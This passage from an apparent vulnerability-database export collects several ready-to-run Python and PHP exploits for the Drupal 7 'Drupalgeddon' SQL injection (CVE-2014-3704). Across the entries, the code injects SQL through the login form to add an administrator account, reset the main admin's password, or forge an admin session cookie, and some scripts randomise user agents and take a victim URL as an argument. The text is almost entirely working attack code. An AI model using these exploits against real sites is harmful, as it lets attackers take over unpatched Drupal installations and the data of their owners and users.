(KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',\r\n 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\r\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',\r\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',\r\n 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',\r\n 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',\r\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',\r\n 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',\r\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\r\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',\r\n 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',\r\n 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\r\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']\r\n \r\n UA = random.choice(userAgent)\r\n return UA\r\n \r\n \r\ndef urldrupal(url):\r\n if url[:8] != &quot;https://&quot; and url[:7] != &quot;http://&quot;:\r\n print('[X] You must insert http:// or https:// procotol')\r\n sys.exit(1)\r\n # Page login\r\n url = url+'/?q=node&amp;destination=node'\r\n return url\r\n \r\n \r\nbanner = &quot;&quot;&quot;\r\n ______ __ _______ _______ _____ \r\n | _ \\ .----.--.--.-----.---.-| | | _ || _ | _ | \r\n |. | \\| _| | | _ | _ | | |___| _|___| |.| | \r\n |. | |__| |_____| __|___._|__| / |___(__ `-|. | \r\n |: 1 / |__| | | |: 1 | |: | \r\n |::.. . / | | |::.. . | |::.| \r\n `------' `---' `-------' `---' \r\n _______ __ ___ __ __ __ \r\n | _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.\r\n | 1___| _ | | |. | | | -__| __| _| | _ | |\r\n |____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|\r\n |: 1 | |__| |: | |___| \r\n |::.. . | |::.| \r\n `-------' `---' \r\n \r\n Drup4l =&gt; 7.0 &lt;= 7.31 Sql-1nj3ct10n\r\n Admin 4cc0unt cr3at0r\r\n \r\n Discovered by:\r\n \r\n Stefan Horst\r\n (CVE-2014-3704)\r\n \r\n Written by:\r\n \r\n Claudio Viviani\r\n \r\n http://www.homelab.it\r\n \r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n \r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n \r\n&quot;&quot;&quot;\r\n \r\ncommandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\\n')\r\ncommandList.add_option('-t', '--target',\r\n action=&quot;store&quot;,\r\n help=&quot;Insert URL: http[s]://www.victim.com&quot;,\r\n )\r\ncommandList.add_option('-u', '--username',\r\n action=&quot;store&quot;,\r\n help=&quot;Insert username&quot;,\r\n )\r\ncommandList.add_option('-p', '--pwd',\r\n action=&quot;store&quot;,\r\n help=&quot;Insert password&quot;,\r\n )\r\noptions, remainder = commandList.parse_args()\r\n \r\n# Check args\r\nif not options.target or not options.username or not options.pwd:\r\n print(banner)\r\n print\r\n commandList.print_help()\r\n sys.exit(1)\r\n \r\nprint(banner)\r\n \r\nhost = options.target\r\nuser = options.username\r\npassword = options.pwd\r\n \r\nhash = DrupalHash(&quot;$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML&quot;, password).get_hash()\r\n \r\ntarget = urldrupal(host)\r\n \r\n \r\n# Add new user:\r\n# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users\r\n#\r\n# Set administrator permission (rid = 3):\r\n# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)\r\n#\r\npost_data = &quot;name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27&quot;+user+&quot;%27,+%27&quot;+hash[:55]+&quot;%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27&quot;+user+&quot;%27),+3);;#%20%20]=test3&amp;name[0]=test&amp;pass=shit2&amp;test2=test&amp;form_build_id=&amp;form_id=user_login_block&amp;op=Log+in&quot;\r\n \r\nUA = randomAgentGen()\r\ntry:\r\n req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })\r\n content = urllib2.urlopen(req).read()\r\n \r\n if &quot;mb_strlen() expects parameter 1&quot; in content:\r\n print &quot;[!] VULNERABLE!&quot;\r\n print\r\n print &quot;[!] Administrator user created!&quot;\r\n print\r\n print &quot;[*] Login: &quot;+str(user)\r\n print &quot;[*] Pass: &quot;+str(password)\r\n print &quot;[*] Url: &quot;+str(target)\r\n \r\n else:\r\n print &quot;[X] NOT Vulnerable :(&quot;\r\n \r\nexcept urllib2.HTTPError as e:\r\n \r\n print &quot;[X] HTTP Error: &quot;+str(e.reason)+&quot; (&quot;+str(e.code)+&quot;)&quot;\r\n \r\nexcept urllib2.URLError as e:\r\n \r\n print &quot;[X] Connection error: &quot;+str(e.reason)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87363", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:10:00", "description": "No description provided by source.", "published": "2014-11-13T00:00:00", "type": "seebug", "title": "Drupal Core &lt;= 7.32 - SQL Injection (PHP)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87362", "id": "SSV:87362", "sourceData": "\n &lt;?php\r\n#-----------------------------------------------------------------------------#\r\n# Exploit Title: Drupal core 7.x - SQL Injection #\r\n# Date: Oct 16 2014 #\r\n# Exploit Author: Dustin D\u00f6rr #\r\n# Software Link: http://www.drupal.com/ #\r\n# Version: Drupal core 7.x versions prior to 7.32 #\r\n# CVE: CVE-2014-3704 #\r\n#-----------------------------------------------------------------------------#\r\n \r\n$url = 'http://www.example.com';\r\n$post_data = &quot;name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'&quot; . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . &quot;'+where+uid+%3D+'1';;#%20%20]=test3&amp;name[0]=test&amp;pass=test&amp;test2=test&amp;form_build_id=&amp;form_id=user_login_block&amp;op=Log+in&quot;;\r\n \r\n$params = array(\r\n'http' =&gt; array(\r\n'method' =&gt; 'POST',\r\n'header' =&gt; &quot;Content-Type: application/x-www-form-urlencoded\\r\\n&quot;,\r\n'content' =&gt; $post_data\r\n)\r\n);\r\n$ctx = stream_context_create($params);\r\n$data = file_get_contents($url . '?q=node&amp;destination=node', null, $ctx);\r\n \r\nif(stristr($data, 'mb_strlen() expects parameter 1 to be string') &amp;&amp; $data) {\r\necho &quot;Success! Log in with username \\&quot;admin\\&quot; and password \\&quot;admin\\&quot; at {$url}user/login&quot;;\r\n} else {\r\necho &quot;Error! Either the website isn't vulnerable, or your Internet isn't working. &quot;;\r\n}\r\n?&gt;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87362", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T00:21:03", "description": "Drupal Core <= 7.32 - SQL Injection (1). Webapps exploit for php platform", "published": "2014-10-16T00:00:00", "type": "exploitdb", "title": "Drupal Core <= 7.32 - SQL Injection 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-16T00:00:00", "id": "EDB-ID:34984", "href": "https://www.exploit-db.com/exploits/34984/", "sourceData": "#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005\r\n#Creditz to https://www.reddit.com/user/fyukyuk\r\nimport urllib2,sys\r\nfrom drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\r\nhost = sys.argv[1]\r\nuser = sys.argv[2]\r\npassword = sys.argv[3]\r\nif len(sys.argv) != 3:\r\n print \"host username password\"\r\n print \"http://nope.io admin wowsecure\"\r\nhash = DrupalHash(\"$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML\", password).get_hash()\r\ntarget = '%s/?q=node&destination=node' % host\r\npost_data = \"name[0%20;update+users+set+name%3d\\'\" \\\r\n +user \\\r\n +\"'+,+pass+%3d+'\" \\\r\n +hash[:55] \\\r\n +\"'+where+uid+%3d+\\'1\\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in\"\r\ncontent = urllib2.urlopen(url=target, data=post_data).read()\r\nif \"mb_strlen() expects parameter 1\" in content:\r\n print \"Success!\\nLogin now with user:%s and pass:%s\" % (user, password)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34984/"}, {"lastseen": "2016-02-04T00:22:15", "description": "Drupal Core <= 7.32 - SQL Injection (PHP). CVE-2014-3704,CVE-CVE-2014-3704. Webapps exploit for php platform", "published": "2014-10-17T00:00:00", "type": "exploitdb", "title": "Drupal Core <= 7.32 - SQL Injection PHP", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "EDB-ID:34993", "href": "https://www.exploit-db.com/exploits/34993/", "sourceData": "<?php\r\n#-----------------------------------------------------------------------------#\r\n# Exploit Title: Drupal core 7.x - SQL Injection #\r\n# Date: Oct 16 2014 #\r\n# Exploit Author: Dustin D\u0e23\u0e16rr #\r\n# Software Link: http://www.drupal.com/ #\r\n# Version: Drupal core 7.x versions prior to 7.32 #\r\n# CVE: CVE-2014-3704 #\r\n#-----------------------------------------------------------------------------#\r\n\r\n$url = 'http://www.example.com';\r\n$post_data = \"name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'\" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . \"'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\";\r\n\r\n$params = array(\r\n'http' => array(\r\n'method' => 'POST',\r\n'header' => \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\r\n'content' => $post_data\r\n)\r\n);\r\n$ctx = stream_context_create($params);\r\n$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);\r\n\r\nif(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {\r\necho \"Success! Log in with username \\\"admin\\\" and password \\\"admin\\\" at {$url}user/login\";\r\n} else {\r\necho \"Error! Either the website isn't vulnerable, or your Internet isn't working. \";\r\n}\r\n?>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34993/"}, {"lastseen": "2018-05-24T14:10:17", "description": "Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session). CVE-2014-3704. Webapps exploit for PHP platform", "published": "2014-11-03T00:00:00", "type": "exploitdb", "title": "Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-11-03T00:00:00", "id": "EDB-ID:44355", "href": "https://www.exploit-db.com/exploits/44355/", "sourceData": "<?php\r\n// _____ __ __ _ _______\r\n// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____\r\n// \\__ \\/ _ \\/ //_/ __/ / __ \\/ __ \\/ __/ / / __ \\/ ___/\r\n// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )\r\n// /____/\\___/_/|_|\\__/_/\\____/_/ /_/_____/_/_/ /_/____/\r\n// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins\r\n//\r\n// created by Stefan Horst <stefan.horst@sektioneins.de>\r\n//\u00c2\u00b7\r\n\r\ninclude 'common.inc';\r\ninclude 'password.inc';\r\n\r\n// set values\r\n$user_name = 'admin';\r\n\r\n$url = isset($argv[1])?$argv[1]:'';\r\n$user_id = isset($argv[2])?intval($argv[2]):1;\r\n\r\nif ($url == '-h') {\r\n echo \"usage:\\n\";\r\n echo $argv[0].' $url [$user_id]'.\"\\n\";\r\n die();\r\n}\r\n\r\nif (empty($url) || strpos($url,'https') === False) {\r\n echo \"please state the cookie url. It works only with https urls.\\n\";\r\n die();\r\n}\r\n\r\nif (strpos($url, 'www.') === 0) {\r\n $url = substr($url, 4);\r\n}\r\n\r\n$url = rtrim($url,'/');\r\n\r\nlist( , $session_name) = explode('://', $url, 2);\r\n\r\n// use insecure cookie with sql inj.\r\n$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);\r\n$password = user_hash_password('test');\r\n\r\n$session_id = drupal_random_key();\r\n$sec_ssid = drupal_random_key();\r\n\r\n$inject = \"UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- \";\r\n\r\n$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;\r\n\r\n// send the request to the server\r\n$ch = curl_init($url);\r\n\r\ncurl_setopt($ch,CURLOPT_HEADER,True);\r\ncurl_setopt($ch,CURLOPT_RETURNTRANSFER,True);\r\ncurl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);\r\ncurl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');\r\n\r\ncurl_setopt($ch,CURLOPT_HTTPHEADER,array(\r\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Language: en-US,en;q=0.5'\r\n));\r\n\r\ncurl_setopt($ch,CURLOPT_COOKIE,$cookie);\r\n\r\n$output = curl_exec($ch);\r\n\r\ncurl_close($ch);\r\n\r\necho \"Session with this ID created:\\n\";\r\necho \"S\".$cookieName.\": \".$sec_ssid;", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44355/"}, {"lastseen": "2016-02-04T00:22:05", "description": "Drupal Core <= 7.32 - SQL Injection (2). CVE-2014-3704,CVE-CVE-2014-3704. Webapps exploit for php platform", "published": "2014-10-17T00:00:00", "type": "exploitdb", "title": "Drupal Core <= 7.32 - SQL Injection 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "EDB-ID:34992", "href": "https://www.exploit-db.com/exploits/34992/", "sourceData": "#!/usr/bin/python\r\n#\r\n# \r\n# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005\r\n# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)\r\n#\r\n# Tested on Drupal 7.31 with BackBox 3.x\r\n#\r\n# This material is intended for educational \r\n# purposes only and the author can not be held liable for \r\n# any kind of damages done whatsoever to your machine, \r\n# or damages caused by some other,creative application of this material.\r\n# In any case you disagree with the above statement,stop here.\r\n\r\nimport hashlib, urllib2, optparse, random, sys\r\n\r\n# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\r\n# Calculate a non-truncated Drupal 7 compatible password hash.\r\n# The consumer of these hashes must truncate correctly.\r\n\r\nclass DrupalHash:\r\n\r\n def __init__(self, stored_hash, password):\r\n self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\r\n self.last_hash = self.rehash(stored_hash, password)\r\n\r\n def get_hash(self):\r\n return self.last_hash\r\n\r\n def password_get_count_log2(self, setting):\r\n return self.itoa64.index(setting[3])\r\n\r\n def password_crypt(self, algo, password, setting):\r\n setting = setting[0:12]\r\n if setting[0] != '$' or setting[2] != '$':\r\n return False\r\n\r\n count_log2 = self.password_get_count_log2(setting)\r\n salt = setting[4:12]\r\n if len(salt) < 8:\r\n return False\r\n count = 1 << count_log2\r\n\r\n if algo == 'md5':\r\n hash_func = hashlib.md5\r\n elif algo == 'sha512':\r\n hash_func = hashlib.sha512\r\n else:\r\n return False\r\n hash_str = hash_func(salt + password).digest()\r\n for c in range(count):\r\n hash_str = hash_func(hash_str + password).digest()\r\n output = setting + self.custom64(hash_str)\r\n return output\r\n\r\n def custom64(self, string, count = 0):\r\n if count == 0:\r\n count = len(string)\r\n output = ''\r\n i = 0\r\n itoa64 = self.itoa64\r\n while 1:\r\n value = ord(string[i])\r\n i += 1\r\n output += itoa64[value & 0x3f]\r\n if i < count:\r\n value |= ord(string[i]) << 8\r\n output += itoa64[(value >> 6) & 0x3f]\r\n if i >= count:\r\n break\r\n i += 1\r\n if i < count:\r\n value |= ord(string[i]) << 16\r\n output += itoa64[(value >> 12) & 0x3f]\r\n if i >= count:\r\n break\r\n i += 1\r\n output += itoa64[(value >> 18) & 0x3f]\r\n if i >= count:\r\n break\r\n return output\r\n\r\n def rehash(self, stored_hash, password):\r\n # Drupal 6 compatibility\r\n if len(stored_hash) == 32 and stored_hash.find('$') == -1:\r\n return hashlib.md5(password).hexdigest()\r\n # Drupal 7\r\n if stored_hash[0:2] == 'U$':\r\n stored_hash = stored_hash[1:]\r\n password = hashlib.md5(password).hexdigest()\r\n hash_type = stored_hash[0:3]\r\n if hash_type == '$S$':\r\n hash_str = self.password_crypt('sha512', password, stored_hash)\r\n elif hash_type == '$H$' or hash_type == '$P$':\r\n hash_str = self.password_crypt('md5', password, stored_hash)\r\n else:\r\n hash_str = False\r\n return hash_str\r\n# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\r\n\r\ndef randomAgentGen():\r\n\r\n userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',\r\n 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',\r\n 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\r\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',\r\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',\r\n 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',\r\n 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',\r\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',\r\n 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',\r\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\r\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',\r\n 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',\r\n 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\r\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']\r\n\r\n UA = random.choice(userAgent)\r\n return UA\r\n\r\n\r\ndef urldrupal(url):\r\n if url[:8] != \"https://\" and url[:7] != \"http://\":\r\n print('[X] You must insert http:// or https:// procotol')\r\n sys.exit(1)\r\n # Page login\r\n url = url+'/?q=node&destination=node'\r\n return url\r\n\r\n\r\nbanner = \"\"\"\r\n ______ __ _______ _______ _____ \r\n | _ \\ .----.--.--.-----.---.-| | | _ || _ | _ | \r\n |. | \\| _| | | _ | _ | | |___| _|___| |.| | \r\n |. | |__| |_____| __|___._|__| / |___(__ `-|. | \r\n |: 1 / |__| | | |: 1 | |: | \r\n |::.. . / | | |::.. . | |::.| \r\n `------' `---' `-------' `---' \r\n _______ __ ___ __ __ __ \r\n | _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.\r\n | 1___| _ | | |. | | | -__| __| _| | _ | |\r\n |____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|\r\n |: 1 | |__| |: | |___| \r\n |::.. . | |::.| \r\n `-------' `---' \r\n \r\n Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n\r\n Admin 4cc0unt cr3at0r\r\n\r\n\t\t\t Discovered by:\r\n\r\n\t\t\t Stefan Horst\r\n (CVE-2014-3704)\r\n\r\n Written by:\r\n\r\n Claudio Viviani\r\n\r\n http://www.homelab.it\r\n\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\r\n\"\"\"\r\n\r\ncommandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\\n')\r\ncommandList.add_option('-t', '--target',\r\n action=\"store\",\r\n help=\"Insert URL: http[s]://www.victim.com\",\r\n )\r\ncommandList.add_option('-u', '--username',\r\n action=\"store\",\r\n help=\"Insert username\",\r\n )\r\ncommandList.add_option('-p', '--pwd',\r\n action=\"store\",\r\n help=\"Insert password\",\r\n )\r\noptions, remainder = commandList.parse_args()\r\n\r\n# Check args\r\nif not options.target or not options.username or not options.pwd:\r\n print(banner)\r\n print\r\n commandList.print_help()\r\n sys.exit(1)\r\n\r\nprint(banner)\r\n\r\nhost = options.target\r\nuser = options.username\r\npassword = options.pwd\r\n\r\nhash = DrupalHash(\"$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML\", password).get_hash()\r\n\r\ntarget = urldrupal(host)\r\n\r\n\r\n# Add new user:\r\n# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users\r\n#\r\n# Set administrator permission (rid = 